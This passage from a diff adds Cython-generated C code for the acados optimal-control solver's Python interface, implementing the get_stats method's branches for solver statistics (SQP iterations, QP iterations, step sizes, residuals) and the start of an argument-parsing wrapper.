+ * elif field_ in double_fields: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 395, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_field}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 395, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":394 + * field = field_.encode('utf-8') + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: # <<<<<<<<<<<<<< + * return self.__get_stat_int(field) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":397 + * return self.__get_stat_int(field) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * return self.__get_stat_double(field) + * + */ + __pyx_t_6 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_double_fields, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 397, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":398 + * + * elif field_ in double_fields: + * return self.__get_stat_double(field) # <<<<<<<<<<<<<< + * + * elif field_ == 'statistics': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 398, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_field}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 398, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":397 + * return self.__get_stat_int(field) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * return self.__get_stat_double(field) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":400 + * return self.__get_stat_double(field) + * + * elif field_ == 'statistics': # <<<<<<<<<<<<<< + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_statistics, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 400, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":401 + * + * elif field_ == 'statistics': + * sqp_iter = self.get_stats("sqp_iter") # <<<<<<<<<<<<<< + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_sqp_iter}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_sqp_iter = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":402 + * elif field_ == 'statistics': + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") # <<<<<<<<<<<<<< + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 402, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_stat_m}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 402, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_stat_m = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":403 + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") # <<<<<<<<<<<<<< + * min_size = min([stat_m, sqp_iter+1]) + * return self.__get_stat_matrix(field, stat_n+1, min_size) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 403, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_stat_n}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 403, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_stat_n = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":404 + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) # <<<<<<<<<<<<<< + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + */ + __pyx_t_2 = __Pyx_PyInt_AddObjC(__pyx_v_sqp_iter, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 404, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF(__pyx_v_stat_m); + __pyx_t_1 = __pyx_v_stat_m; + __pyx_t_7 = PyObject_RichCompare(__pyx_t_2, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_7); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 404, __pyx_L1_error) + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_7); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 404, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (__pyx_t_6) { + __Pyx_INCREF(__pyx_t_2); + __pyx_t_3 = __pyx_t_2; + } else { + __Pyx_INCREF(__pyx_t_1); + __pyx_t_3 = __pyx_t_1; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __pyx_t_3; + __Pyx_INCREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_min_size = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":405 + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) + * return self.__get_stat_matrix(field, stat_n+1, min_size) # <<<<<<<<<<<<<< + * + * elif field_ == 'qp_iter': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_v_stat_n, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[4] = {__pyx_t_7, __pyx_v_field, __pyx_t_1, __pyx_v_min_size}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":400 + * return self.__get_stat_double(field) + * + * elif field_ == 'statistics': # <<<<<<<<<<<<<< + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":407 + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + * elif field_ == 'qp_iter': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_qp_iter, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 407, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":408 + * + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') # <<<<<<<<<<<<<< + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 408, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_n_u_statistics}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 408, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_full_stats = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":409 + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 409, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":410 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] # <<<<<<<<<<<<<< + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__18); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 410, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":409 + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":411 + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': # <<<<<<<<<<<<<< + * return full_stats[2, :] + * + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 411, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":412 + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] # <<<<<<<<<<<<<< + * + * elif field_ == 'alpha': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__19); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 412, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":411 + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': # <<<<<<<<<<<<<< + * return full_stats[2, :] + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":407 + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + * elif field_ == 'qp_iter': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":414 + * return full_stats[2, :] + * + * elif field_ == 'alpha': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_alpha, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 414, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":415 + * + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') # <<<<<<<<<<<<<< + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_n_u_statistics}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_full_stats = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":416 + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 416, __pyx_L1_error) + if (likely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":417 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] # <<<<<<<<<<<<<< + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__20); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 417, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":416 + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":419 + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") # <<<<<<<<<<<<<< + * + * elif field_ == 'residuals': + */ + /*else*/ { + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__21, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 419, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 419, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":414 + * return full_stats[2, :] + * + * elif field_ == 'alpha': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":421 + * raise Exception("alpha values are not available for SQP_RTI") + * + * elif field_ == 'residuals': # <<<<<<<<<<<<<< + * return self.get_residuals() + * + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_residuals, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 421, __pyx_L1_error) + if (likely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":422 + * + * elif field_ == 'residuals': + * return self.get_residuals() # <<<<<<<<<<<<<< + * + * else: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_residuals); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 422, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_1, }; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 422, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":421 + * raise Exception("alpha values are not available for SQP_RTI") + * + * elif field_ == 'residuals': # <<<<<<<<<<<<<< + * return self.get_residuals() + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":425 + * + * else: + * raise NotImplementedError("TODO!") # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__22, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 425, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 425, __pyx_L1_error) + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_stats", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_double_fields); + __Pyx_XDECREF(__pyx_v_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF(__pyx_v_sqp_iter); + __Pyx_XDECREF(__pyx_v_stat_m); + __Pyx_XDECREF(__pyx_v_stat_n); + __Pyx_XDECREF(__pyx_v_min_size); + __Pyx_XDECREF(__pyx_v_full_stats); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int = {"_AcadosOcpSolverCython__get_stat_int", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_int (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 428, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_int") < 0)) __PYX_ERR(0, 428, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_int", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 428, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + 